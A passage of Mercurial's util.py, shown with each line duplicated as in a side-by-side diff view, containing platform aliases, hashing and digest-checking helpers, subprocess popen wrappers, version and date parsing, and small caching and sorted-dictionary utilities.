10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import
16 from __future__ import absolute_import
17
17
18 import bz2
18 import bz2
19 import calendar
19 import calendar
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import datetime
22 import datetime
23 import errno
23 import errno
24 import gc
24 import gc
25 import hashlib
25 import hashlib
26 import imp
26 import imp
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import signal
31 import signal
32 import socket
32 import socket
33 import stat
33 import stat
34 import string
34 import string
35 import subprocess
35 import subprocess
36 import sys
36 import sys
37 import tempfile
37 import tempfile
38 import textwrap
38 import textwrap
39 import time
39 import time
40 import traceback
40 import traceback
41 import warnings
41 import warnings
42 import zlib
42 import zlib
43
43
44 from . import (
44 from . import (
45 encoding,
45 encoding,
46 error,
46 error,
47 i18n,
47 i18n,
48 osutil,
48 osutil,
49 parsers,
49 parsers,
50 pycompat,
50 pycompat,
51 )
51 )
52
52
53 cookielib = pycompat.cookielib
53 cookielib = pycompat.cookielib
54 empty = pycompat.empty
54 empty = pycompat.empty
55 httplib = pycompat.httplib
55 httplib = pycompat.httplib
56 httpserver = pycompat.httpserver
56 httpserver = pycompat.httpserver
57 pickle = pycompat.pickle
57 pickle = pycompat.pickle
58 queue = pycompat.queue
58 queue = pycompat.queue
59 socketserver = pycompat.socketserver
59 socketserver = pycompat.socketserver
60 stderr = pycompat.stderr
60 stderr = pycompat.stderr
61 stdin = pycompat.stdin
61 stdin = pycompat.stdin
62 stdout = pycompat.stdout
62 stdout = pycompat.stdout
63 stringio = pycompat.stringio
63 stringio = pycompat.stringio
64 urlerr = pycompat.urlerr
64 urlerr = pycompat.urlerr
65 urlreq = pycompat.urlreq
65 urlreq = pycompat.urlreq
66 xmlrpclib = pycompat.xmlrpclib
66 xmlrpclib = pycompat.xmlrpclib
67
67
68 # workaround for win32mbcs
68 # workaround for win32mbcs
69 _filenamebytestr = pycompat.bytestr
69 _filenamebytestr = pycompat.bytestr
70
70
71 def isatty(fp):
71 def isatty(fp):
72 try:
72 try:
73 return fp.isatty()
73 return fp.isatty()
74 except AttributeError:
74 except AttributeError:
75 return False
75 return False
76
76
77 # glibc determines buffering on first write to stdout - if we replace a TTY
77 # glibc determines buffering on first write to stdout - if we replace a TTY
78 # destined stdout with a pipe destined stdout (e.g. pager), we want line
78 # destined stdout with a pipe destined stdout (e.g. pager), we want line
79 # buffering
79 # buffering
80 if isatty(stdout):
80 if isatty(stdout):
81 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
81 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
82
82
83 if pycompat.osname == 'nt':
83 if pycompat.osname == 'nt':
84 from . import windows as platform
84 from . import windows as platform
85 stdout = platform.winstdout(stdout)
85 stdout = platform.winstdout(stdout)
86 else:
86 else:
87 from . import posix as platform
87 from . import posix as platform
88
88
89 _ = i18n._
89 _ = i18n._
90
90
91 bindunixsocket = platform.bindunixsocket
91 bindunixsocket = platform.bindunixsocket
92 cachestat = platform.cachestat
92 cachestat = platform.cachestat
93 checkexec = platform.checkexec
93 checkexec = platform.checkexec
94 checklink = platform.checklink
94 checklink = platform.checklink
95 copymode = platform.copymode
95 copymode = platform.copymode
96 executablepath = platform.executablepath
96 executablepath = platform.executablepath
97 expandglobs = platform.expandglobs
97 expandglobs = platform.expandglobs
98 explainexit = platform.explainexit
98 explainexit = platform.explainexit
99 findexe = platform.findexe
99 findexe = platform.findexe
100 gethgcmd = platform.gethgcmd
100 gethgcmd = platform.gethgcmd
101 getuser = platform.getuser
101 getuser = platform.getuser
102 getpid = os.getpid
102 getpid = os.getpid
103 groupmembers = platform.groupmembers
103 groupmembers = platform.groupmembers
104 groupname = platform.groupname
104 groupname = platform.groupname
105 hidewindow = platform.hidewindow
105 hidewindow = platform.hidewindow
106 isexec = platform.isexec
106 isexec = platform.isexec
107 isowner = platform.isowner
107 isowner = platform.isowner
108 localpath = platform.localpath
108 localpath = platform.localpath
109 lookupreg = platform.lookupreg
109 lookupreg = platform.lookupreg
110 makedir = platform.makedir
110 makedir = platform.makedir
111 nlinks = platform.nlinks
111 nlinks = platform.nlinks
112 normpath = platform.normpath
112 normpath = platform.normpath
113 normcase = platform.normcase
113 normcase = platform.normcase
114 normcasespec = platform.normcasespec
114 normcasespec = platform.normcasespec
115 normcasefallback = platform.normcasefallback
115 normcasefallback = platform.normcasefallback
116 openhardlinks = platform.openhardlinks
116 openhardlinks = platform.openhardlinks
117 oslink = platform.oslink
117 oslink = platform.oslink
118 parsepatchoutput = platform.parsepatchoutput
118 parsepatchoutput = platform.parsepatchoutput
119 pconvert = platform.pconvert
119 pconvert = platform.pconvert
120 poll = platform.poll
120 poll = platform.poll
121 popen = platform.popen
121 popen = platform.popen
122 posixfile = platform.posixfile
122 posixfile = platform.posixfile
123 quotecommand = platform.quotecommand
123 quotecommand = platform.quotecommand
124 readpipe = platform.readpipe
124 readpipe = platform.readpipe
125 rename = platform.rename
125 rename = platform.rename
126 removedirs = platform.removedirs
126 removedirs = platform.removedirs
127 samedevice = platform.samedevice
127 samedevice = platform.samedevice
128 samefile = platform.samefile
128 samefile = platform.samefile
129 samestat = platform.samestat
129 samestat = platform.samestat
130 setbinary = platform.setbinary
130 setbinary = platform.setbinary
131 setflags = platform.setflags
131 setflags = platform.setflags
132 setsignalhandler = platform.setsignalhandler
132 setsignalhandler = platform.setsignalhandler
133 shellquote = platform.shellquote
133 shellquote = platform.shellquote
134 spawndetached = platform.spawndetached
134 spawndetached = platform.spawndetached
135 split = platform.split
135 split = platform.split
136 sshargs = platform.sshargs
136 sshargs = platform.sshargs
137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
138 statisexec = platform.statisexec
138 statisexec = platform.statisexec
139 statislink = platform.statislink
139 statislink = platform.statislink
140 testpid = platform.testpid
140 testpid = platform.testpid
141 umask = platform.umask
141 umask = platform.umask
142 unlink = platform.unlink
142 unlink = platform.unlink
143 username = platform.username
143 username = platform.username
144
144
145 # Python compatibility
145 # Python compatibility
146
146
147 _notset = object()
147 _notset = object()
148
148
149 # disable Python's problematic floating point timestamps (issue4836)
149 # disable Python's problematic floating point timestamps (issue4836)
150 # (Python hypocritically says you shouldn't change this behavior in
150 # (Python hypocritically says you shouldn't change this behavior in
151 # libraries, and sure enough Mercurial is not a library.)
151 # libraries, and sure enough Mercurial is not a library.)
152 os.stat_float_times(False)
152 os.stat_float_times(False)
153
153
154 def safehasattr(thing, attr):
154 def safehasattr(thing, attr):
155 return getattr(thing, attr, _notset) is not _notset
155 return getattr(thing, attr, _notset) is not _notset
156
156
157 def bitsfrom(container):
157 def bitsfrom(container):
158 bits = 0
158 bits = 0
159 for bit in container:
159 for bit in container:
160 bits |= bit
160 bits |= bit
161 return bits
161 return bits
162
162
163 # python 2.6 still have deprecation warning enabled by default. We do not want
163 # python 2.6 still have deprecation warning enabled by default. We do not want
164 # to display anything to standard user so detect if we are running test and
164 # to display anything to standard user so detect if we are running test and
165 # only use python deprecation warning in this case.
165 # only use python deprecation warning in this case.
166 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
166 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
167 if _dowarn:
167 if _dowarn:
168 # explicitly unfilter our warning for python 2.7
168 # explicitly unfilter our warning for python 2.7
169 #
169 #
170 # The option of setting PYTHONWARNINGS in the test runner was investigated.
170 # The option of setting PYTHONWARNINGS in the test runner was investigated.
171 # However, module name set through PYTHONWARNINGS was exactly matched, so
171 # However, module name set through PYTHONWARNINGS was exactly matched, so
172 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
172 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
173 # makes the whole PYTHONWARNINGS thing useless for our usecase.
173 # makes the whole PYTHONWARNINGS thing useless for our usecase.
174 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
174 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
175 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
175 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
176 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
176 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
177
177
178 def nouideprecwarn(msg, version, stacklevel=1):
178 def nouideprecwarn(msg, version, stacklevel=1):
179 """Issue an python native deprecation warning
179 """Issue an python native deprecation warning
180
180
181 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
181 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
182 """
182 """
183 if _dowarn:
183 if _dowarn:
184 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
184 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
185 " update your code.)") % version
185 " update your code.)") % version
186 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
186 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
187
187
188 DIGESTS = {
188 DIGESTS = {
189 'md5': hashlib.md5,
189 'md5': hashlib.md5,
190 'sha1': hashlib.sha1,
190 'sha1': hashlib.sha1,
191 'sha512': hashlib.sha512,
191 'sha512': hashlib.sha512,
192 }
192 }
193 # List of digest types from strongest to weakest
193 # List of digest types from strongest to weakest
194 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
194 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
195
195
196 for k in DIGESTS_BY_STRENGTH:
196 for k in DIGESTS_BY_STRENGTH:
197 assert k in DIGESTS
197 assert k in DIGESTS
198
198
199 class digester(object):
199 class digester(object):
200 """helper to compute digests.
200 """helper to compute digests.
201
201
202 This helper can be used to compute one or more digests given their name.
202 This helper can be used to compute one or more digests given their name.
203
203
204 >>> d = digester(['md5', 'sha1'])
204 >>> d = digester(['md5', 'sha1'])
205 >>> d.update('foo')
205 >>> d.update('foo')
206 >>> [k for k in sorted(d)]
206 >>> [k for k in sorted(d)]
207 ['md5', 'sha1']
207 ['md5', 'sha1']
208 >>> d['md5']
208 >>> d['md5']
209 'acbd18db4cc2f85cedef654fccc4a4d8'
209 'acbd18db4cc2f85cedef654fccc4a4d8'
210 >>> d['sha1']
210 >>> d['sha1']
211 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
211 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
212 >>> digester.preferred(['md5', 'sha1'])
212 >>> digester.preferred(['md5', 'sha1'])
213 'sha1'
213 'sha1'
214 """
214 """
215
215
216 def __init__(self, digests, s=''):
216 def __init__(self, digests, s=''):
217 self._hashes = {}
217 self._hashes = {}
218 for k in digests:
218 for k in digests:
219 if k not in DIGESTS:
219 if k not in DIGESTS:
220 raise Abort(_('unknown digest type: %s') % k)
220 raise Abort(_('unknown digest type: %s') % k)
221 self._hashes[k] = DIGESTS[k]()
221 self._hashes[k] = DIGESTS[k]()
222 if s:
222 if s:
223 self.update(s)
223 self.update(s)
224
224
225 def update(self, data):
225 def update(self, data):
226 for h in self._hashes.values():
226 for h in self._hashes.values():
227 h.update(data)
227 h.update(data)
228
228
229 def __getitem__(self, key):
229 def __getitem__(self, key):
230 if key not in DIGESTS:
230 if key not in DIGESTS:
231 raise Abort(_('unknown digest type: %s') % k)
231 raise Abort(_('unknown digest type: %s') % k)
232 return self._hashes[key].hexdigest()
232 return self._hashes[key].hexdigest()
233
233
234 def __iter__(self):
234 def __iter__(self):
235 return iter(self._hashes)
235 return iter(self._hashes)
236
236
237 @staticmethod
237 @staticmethod
238 def preferred(supported):
238 def preferred(supported):
239 """returns the strongest digest type in both supported and DIGESTS."""
239 """returns the strongest digest type in both supported and DIGESTS."""
240
240
241 for k in DIGESTS_BY_STRENGTH:
241 for k in DIGESTS_BY_STRENGTH:
242 if k in supported:
242 if k in supported:
243 return k
243 return k
244 return None
244 return None
245
245
246 class digestchecker(object):
246 class digestchecker(object):
247 """file handle wrapper that additionally checks content against a given
247 """file handle wrapper that additionally checks content against a given
248 size and digests.
248 size and digests.
249
249
250 d = digestchecker(fh, size, {'md5': '...'})
250 d = digestchecker(fh, size, {'md5': '...'})
251
251
252 When multiple digests are given, all of them are validated.
252 When multiple digests are given, all of them are validated.
253 """
253 """
254
254
255 def __init__(self, fh, size, digests):
255 def __init__(self, fh, size, digests):
256 self._fh = fh
256 self._fh = fh
257 self._size = size
257 self._size = size
258 self._got = 0
258 self._got = 0
259 self._digests = dict(digests)
259 self._digests = dict(digests)
260 self._digester = digester(self._digests.keys())
260 self._digester = digester(self._digests.keys())
261
261
262 def read(self, length=-1):
262 def read(self, length=-1):
263 content = self._fh.read(length)
263 content = self._fh.read(length)
264 self._digester.update(content)
264 self._digester.update(content)
265 self._got += len(content)
265 self._got += len(content)
266 return content
266 return content
267
267
268 def validate(self):
268 def validate(self):
269 if self._size != self._got:
269 if self._size != self._got:
270 raise Abort(_('size mismatch: expected %d, got %d') %
270 raise Abort(_('size mismatch: expected %d, got %d') %
271 (self._size, self._got))
271 (self._size, self._got))
272 for k, v in self._digests.items():
272 for k, v in self._digests.items():
273 if v != self._digester[k]:
273 if v != self._digester[k]:
274 # i18n: first parameter is a digest name
274 # i18n: first parameter is a digest name
275 raise Abort(_('%s mismatch: expected %s, got %s') %
275 raise Abort(_('%s mismatch: expected %s, got %s') %
276 (k, v, self._digester[k]))
276 (k, v, self._digester[k]))
277
277
278 try:
278 try:
279 buffer = buffer
279 buffer = buffer
280 except NameError:
280 except NameError:
281 if not pycompat.ispy3:
281 if not pycompat.ispy3:
282 def buffer(sliceable, offset=0, length=None):
282 def buffer(sliceable, offset=0, length=None):
283 if length is not None:
283 if length is not None:
284 return sliceable[offset:offset + length]
284 return sliceable[offset:offset + length]
285 return sliceable[offset:]
285 return sliceable[offset:]
286 else:
286 else:
287 def buffer(sliceable, offset=0, length=None):
287 def buffer(sliceable, offset=0, length=None):
288 if length is not None:
288 if length is not None:
289 return memoryview(sliceable)[offset:offset + length]
289 return memoryview(sliceable)[offset:offset + length]
290 return memoryview(sliceable)[offset:]
290 return memoryview(sliceable)[offset:]
291
291
292 closefds = pycompat.osname == 'posix'
292 closefds = pycompat.osname == 'posix'
293
293
294 _chunksize = 4096
294 _chunksize = 4096
295
295
296 class bufferedinputpipe(object):
296 class bufferedinputpipe(object):
297 """a manually buffered input pipe
297 """a manually buffered input pipe
298
298
299 Python will not let us use buffered IO and lazy reading with 'polling' at
299 Python will not let us use buffered IO and lazy reading with 'polling' at
300 the same time. We cannot probe the buffer state and select will not detect
300 the same time. We cannot probe the buffer state and select will not detect
301 that data are ready to read if they are already buffered.
301 that data are ready to read if they are already buffered.
302
302
303 This class let us work around that by implementing its own buffering
303 This class let us work around that by implementing its own buffering
304 (allowing efficient readline) while offering a way to know if the buffer is
304 (allowing efficient readline) while offering a way to know if the buffer is
305 empty from the output (allowing collaboration of the buffer with polling).
305 empty from the output (allowing collaboration of the buffer with polling).
306
306
307 This class lives in the 'util' module because it makes use of the 'os'
307 This class lives in the 'util' module because it makes use of the 'os'
308 module from the python stdlib.
308 module from the python stdlib.
309 """
309 """
310
310
311 def __init__(self, input):
311 def __init__(self, input):
312 self._input = input
312 self._input = input
313 self._buffer = []
313 self._buffer = []
314 self._eof = False
314 self._eof = False
315 self._lenbuf = 0
315 self._lenbuf = 0
316
316
317 @property
317 @property
318 def hasbuffer(self):
318 def hasbuffer(self):
319 """True is any data is currently buffered
319 """True is any data is currently buffered
320
320
321 This will be used externally a pre-step for polling IO. If there is
321 This will be used externally a pre-step for polling IO. If there is
322 already data then no polling should be set in place."""
322 already data then no polling should be set in place."""
323 return bool(self._buffer)
323 return bool(self._buffer)
324
324
325 @property
325 @property
326 def closed(self):
326 def closed(self):
327 return self._input.closed
327 return self._input.closed
328
328
329 def fileno(self):
329 def fileno(self):
330 return self._input.fileno()
330 return self._input.fileno()
331
331
332 def close(self):
332 def close(self):
333 return self._input.close()
333 return self._input.close()
334
334
335 def read(self, size):
335 def read(self, size):
336 while (not self._eof) and (self._lenbuf < size):
336 while (not self._eof) and (self._lenbuf < size):
337 self._fillbuffer()
337 self._fillbuffer()
338 return self._frombuffer(size)
338 return self._frombuffer(size)
339
339
340 def readline(self, *args, **kwargs):
340 def readline(self, *args, **kwargs):
341 if 1 < len(self._buffer):
341 if 1 < len(self._buffer):
342 # this should not happen because both read and readline end with a
342 # this should not happen because both read and readline end with a
343 # _frombuffer call that collapse it.
343 # _frombuffer call that collapse it.
344 self._buffer = [''.join(self._buffer)]
344 self._buffer = [''.join(self._buffer)]
345 self._lenbuf = len(self._buffer[0])
345 self._lenbuf = len(self._buffer[0])
346 lfi = -1
346 lfi = -1
347 if self._buffer:
347 if self._buffer:
348 lfi = self._buffer[-1].find('\n')
348 lfi = self._buffer[-1].find('\n')
349 while (not self._eof) and lfi < 0:
349 while (not self._eof) and lfi < 0:
350 self._fillbuffer()
350 self._fillbuffer()
351 if self._buffer:
351 if self._buffer:
352 lfi = self._buffer[-1].find('\n')
352 lfi = self._buffer[-1].find('\n')
353 size = lfi + 1
353 size = lfi + 1
354 if lfi < 0: # end of file
354 if lfi < 0: # end of file
355 size = self._lenbuf
355 size = self._lenbuf
356 elif 1 < len(self._buffer):
356 elif 1 < len(self._buffer):
357 # we need to take previous chunks into account
357 # we need to take previous chunks into account
358 size += self._lenbuf - len(self._buffer[-1])
358 size += self._lenbuf - len(self._buffer[-1])
359 return self._frombuffer(size)
359 return self._frombuffer(size)
360
360
361 def _frombuffer(self, size):
361 def _frombuffer(self, size):
362 """return at most 'size' data from the buffer
362 """return at most 'size' data from the buffer
363
363
364 The data are removed from the buffer."""
364 The data are removed from the buffer."""
365 if size == 0 or not self._buffer:
365 if size == 0 or not self._buffer:
366 return ''
366 return ''
367 buf = self._buffer[0]
367 buf = self._buffer[0]
368 if 1 < len(self._buffer):
368 if 1 < len(self._buffer):
369 buf = ''.join(self._buffer)
369 buf = ''.join(self._buffer)
370
370
371 data = buf[:size]
371 data = buf[:size]
372 buf = buf[len(data):]
372 buf = buf[len(data):]
373 if buf:
373 if buf:
374 self._buffer = [buf]
374 self._buffer = [buf]
375 self._lenbuf = len(buf)
375 self._lenbuf = len(buf)
376 else:
376 else:
377 self._buffer = []
377 self._buffer = []
378 self._lenbuf = 0
378 self._lenbuf = 0
379 return data
379 return data
380
380
381 def _fillbuffer(self):
381 def _fillbuffer(self):
382 """read data to the buffer"""
382 """read data to the buffer"""
383 data = os.read(self._input.fileno(), _chunksize)
383 data = os.read(self._input.fileno(), _chunksize)
384 if not data:
384 if not data:
385 self._eof = True
385 self._eof = True
386 else:
386 else:
387 self._lenbuf += len(data)
387 self._lenbuf += len(data)
388 self._buffer.append(data)
388 self._buffer.append(data)
389
389
390 def popen2(cmd, env=None, newlines=False):
390 def popen2(cmd, env=None, newlines=False):
391 # Setting bufsize to -1 lets the system decide the buffer size.
391 # Setting bufsize to -1 lets the system decide the buffer size.
392 # The default for bufsize is 0, meaning unbuffered. This leads to
392 # The default for bufsize is 0, meaning unbuffered. This leads to
393 # poor performance on Mac OS X: http://bugs.python.org/issue4194
393 # poor performance on Mac OS X: http://bugs.python.org/issue4194
394 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
394 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
395 close_fds=closefds,
395 close_fds=closefds,
396 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
396 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
397 universal_newlines=newlines,
397 universal_newlines=newlines,
398 env=env)
398 env=env)
399 return p.stdin, p.stdout
399 return p.stdin, p.stdout
400
400
401 def popen3(cmd, env=None, newlines=False):
401 def popen3(cmd, env=None, newlines=False):
402 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
402 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
403 return stdin, stdout, stderr
403 return stdin, stdout, stderr
404
404
405 def popen4(cmd, env=None, newlines=False, bufsize=-1):
405 def popen4(cmd, env=None, newlines=False, bufsize=-1):
406 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
406 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
407 close_fds=closefds,
407 close_fds=closefds,
408 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
408 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
409 stderr=subprocess.PIPE,
409 stderr=subprocess.PIPE,
410 universal_newlines=newlines,
410 universal_newlines=newlines,
411 env=env)
411 env=env)
412 return p.stdin, p.stdout, p.stderr, p
412 return p.stdin, p.stdout, p.stderr, p
413
413
414 def version():
414 def version():
415 """Return version information if available."""
415 """Return version information if available."""
416 try:
416 try:
417 from . import __version__
417 from . import __version__
418 return __version__.version
418 return __version__.version
419 except ImportError:
419 except ImportError:
420 return 'unknown'
420 return 'unknown'
421
421
422 def versiontuple(v=None, n=4):
422 def versiontuple(v=None, n=4):
423 """Parses a Mercurial version string into an N-tuple.
423 """Parses a Mercurial version string into an N-tuple.
424
424
425 The version string to be parsed is specified with the ``v`` argument.
425 The version string to be parsed is specified with the ``v`` argument.
426 If it isn't defined, the current Mercurial version string will be parsed.
426 If it isn't defined, the current Mercurial version string will be parsed.
427
427
428 ``n`` can be 2, 3, or 4. Here is how some version strings map to
428 ``n`` can be 2, 3, or 4. Here is how some version strings map to
429 returned values:
429 returned values:
430
430
431 >>> v = '3.6.1+190-df9b73d2d444'
431 >>> v = '3.6.1+190-df9b73d2d444'
432 >>> versiontuple(v, 2)
432 >>> versiontuple(v, 2)
433 (3, 6)
433 (3, 6)
434 >>> versiontuple(v, 3)
434 >>> versiontuple(v, 3)
435 (3, 6, 1)
435 (3, 6, 1)
436 >>> versiontuple(v, 4)
436 >>> versiontuple(v, 4)
437 (3, 6, 1, '190-df9b73d2d444')
437 (3, 6, 1, '190-df9b73d2d444')
438
438
439 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
439 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
440 (3, 6, 1, '190-df9b73d2d444+20151118')
440 (3, 6, 1, '190-df9b73d2d444+20151118')
441
441
442 >>> v = '3.6'
442 >>> v = '3.6'
443 >>> versiontuple(v, 2)
443 >>> versiontuple(v, 2)
444 (3, 6)
444 (3, 6)
445 >>> versiontuple(v, 3)
445 >>> versiontuple(v, 3)
446 (3, 6, None)
446 (3, 6, None)
447 >>> versiontuple(v, 4)
447 >>> versiontuple(v, 4)
448 (3, 6, None, None)
448 (3, 6, None, None)
449
449
450 >>> v = '3.9-rc'
450 >>> v = '3.9-rc'
451 >>> versiontuple(v, 2)
451 >>> versiontuple(v, 2)
452 (3, 9)
452 (3, 9)
453 >>> versiontuple(v, 3)
453 >>> versiontuple(v, 3)
454 (3, 9, None)
454 (3, 9, None)
455 >>> versiontuple(v, 4)
455 >>> versiontuple(v, 4)
456 (3, 9, None, 'rc')
456 (3, 9, None, 'rc')
457
457
458 >>> v = '3.9-rc+2-02a8fea4289b'
458 >>> v = '3.9-rc+2-02a8fea4289b'
459 >>> versiontuple(v, 2)
459 >>> versiontuple(v, 2)
460 (3, 9)
460 (3, 9)
461 >>> versiontuple(v, 3)
461 >>> versiontuple(v, 3)
462 (3, 9, None)
462 (3, 9, None)
463 >>> versiontuple(v, 4)
463 >>> versiontuple(v, 4)
464 (3, 9, None, 'rc+2-02a8fea4289b')
464 (3, 9, None, 'rc+2-02a8fea4289b')
465 """
465 """
466 if not v:
466 if not v:
467 v = version()
467 v = version()
468 parts = remod.split('[\+-]', v, 1)
468 parts = remod.split('[\+-]', v, 1)
469 if len(parts) == 1:
469 if len(parts) == 1:
470 vparts, extra = parts[0], None
470 vparts, extra = parts[0], None
471 else:
471 else:
472 vparts, extra = parts
472 vparts, extra = parts
473
473
474 vints = []
474 vints = []
475 for i in vparts.split('.'):
475 for i in vparts.split('.'):
476 try:
476 try:
477 vints.append(int(i))
477 vints.append(int(i))
478 except ValueError:
478 except ValueError:
479 break
479 break
480 # (3, 6) -> (3, 6, None)
480 # (3, 6) -> (3, 6, None)
481 while len(vints) < 3:
481 while len(vints) < 3:
482 vints.append(None)
482 vints.append(None)
483
483
484 if n == 2:
484 if n == 2:
485 return (vints[0], vints[1])
485 return (vints[0], vints[1])
486 if n == 3:
486 if n == 3:
487 return (vints[0], vints[1], vints[2])
487 return (vints[0], vints[1], vints[2])
488 if n == 4:
488 if n == 4:
489 return (vints[0], vints[1], vints[2], extra)
489 return (vints[0], vints[1], vints[2], extra)
490
490
491 # used by parsedate
491 # used by parsedate
492 defaultdateformats = (
492 defaultdateformats = (
493 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
493 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
494 '%Y-%m-%dT%H:%M', # without seconds
494 '%Y-%m-%dT%H:%M', # without seconds
495 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
495 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
496 '%Y-%m-%dT%H%M', # without seconds
496 '%Y-%m-%dT%H%M', # without seconds
497 '%Y-%m-%d %H:%M:%S', # our common legal variant
497 '%Y-%m-%d %H:%M:%S', # our common legal variant
498 '%Y-%m-%d %H:%M', # without seconds
498 '%Y-%m-%d %H:%M', # without seconds
499 '%Y-%m-%d %H%M%S', # without :
499 '%Y-%m-%d %H%M%S', # without :
500 '%Y-%m-%d %H%M', # without seconds
500 '%Y-%m-%d %H%M', # without seconds
501 '%Y-%m-%d %I:%M:%S%p',
501 '%Y-%m-%d %I:%M:%S%p',
502 '%Y-%m-%d %H:%M',
502 '%Y-%m-%d %H:%M',
503 '%Y-%m-%d %I:%M%p',
503 '%Y-%m-%d %I:%M%p',
504 '%Y-%m-%d',
504 '%Y-%m-%d',
505 '%m-%d',
505 '%m-%d',
506 '%m/%d',
506 '%m/%d',
507 '%m/%d/%y',
507 '%m/%d/%y',
508 '%m/%d/%Y',
508 '%m/%d/%Y',
509 '%a %b %d %H:%M:%S %Y',
509 '%a %b %d %H:%M:%S %Y',
510 '%a %b %d %I:%M:%S%p %Y',
510 '%a %b %d %I:%M:%S%p %Y',
511 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
511 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
512 '%b %d %H:%M:%S %Y',
512 '%b %d %H:%M:%S %Y',
513 '%b %d %I:%M:%S%p %Y',
513 '%b %d %I:%M:%S%p %Y',
514 '%b %d %H:%M:%S',
514 '%b %d %H:%M:%S',
515 '%b %d %I:%M:%S%p',
515 '%b %d %I:%M:%S%p',
516 '%b %d %H:%M',
516 '%b %d %H:%M',
517 '%b %d %I:%M%p',
517 '%b %d %I:%M%p',
518 '%b %d %Y',
518 '%b %d %Y',
519 '%b %d',
519 '%b %d',
520 '%H:%M:%S',
520 '%H:%M:%S',
521 '%I:%M:%S%p',
521 '%I:%M:%S%p',
522 '%H:%M',
522 '%H:%M',
523 '%I:%M%p',
523 '%I:%M%p',
524 )
524 )
525
525
526 extendeddateformats = defaultdateformats + (
526 extendeddateformats = defaultdateformats + (
527 "%Y",
527 "%Y",
528 "%Y-%m",
528 "%Y-%m",
529 "%b",
529 "%b",
530 "%b %Y",
530 "%b %Y",
531 )
531 )
532
532
533 def cachefunc(func):
533 def cachefunc(func):
534 '''cache the result of function calls'''
534 '''cache the result of function calls'''
535 # XXX doesn't handle keywords args
535 # XXX doesn't handle keywords args
536 if func.__code__.co_argcount == 0:
536 if func.__code__.co_argcount == 0:
537 cache = []
537 cache = []
538 def f():
538 def f():
539 if len(cache) == 0:
539 if len(cache) == 0:
540 cache.append(func())
540 cache.append(func())
541 return cache[0]
541 return cache[0]
542 return f
542 return f
543 cache = {}
543 cache = {}
544 if func.__code__.co_argcount == 1:
544 if func.__code__.co_argcount == 1:
545 # we gain a small amount of time because
545 # we gain a small amount of time because
546 # we don't need to pack/unpack the list
546 # we don't need to pack/unpack the list
547 def f(arg):
547 def f(arg):
548 if arg not in cache:
548 if arg not in cache:
549 cache[arg] = func(arg)
549 cache[arg] = func(arg)
550 return cache[arg]
550 return cache[arg]
551 else:
551 else:
552 def f(*args):
552 def f(*args):
553 if args not in cache:
553 if args not in cache:
554 cache[args] = func(*args)
554 cache[args] = func(*args)
555 return cache[args]
555 return cache[args]
556
556
557 return f
557 return f
558
558
559 class sortdict(dict):
559 class sortdict(dict):
560 '''a simple sorted dictionary'''
560 '''a simple sorted dictionary'''
561 def __init__(self, data=None):
561 def __init__(self, data=None):
562 self._list = []
562 self._list = []
563 if data:
563 if data:
564 self.update(data)
564 self.update(data)
565 def copy(self):
565 def copy(self):
566 return sortdict(self)
566 return sortdict(self)
567 def __setitem__(self, key, val):
567 def __setitem__(self, key, val):
568 if key in self:
568 if key in self:
569 self._list.remove(key)
569 self._list.remove(key)
570 self._list.append(key)
570 self._list.append(key)
571 dict.__setitem__(self, key, val)
571 dict.__setitem__(self, key, val)
572 def __iter__(self):
572 def __iter__(self):
573 return self._list.__iter__()
573 return self._list.__iter__()
574 def update(self, src):
574 def update(self, src):
575 if isinstance(src, dict):
575 if isinstance(src, dict):
576 src = src.iteritems()
576 src = src.iteritems()
577 for k, v in src:
577 for k, v in src:
578 self[k] = v
578 self[k] = v
579 def clear(self):
579 def clear(self):
580 dict.clear(self)
580 dict.clear(self)
581 self._list = []
581 self._list = []
582 def items(self):
582 def items(self):
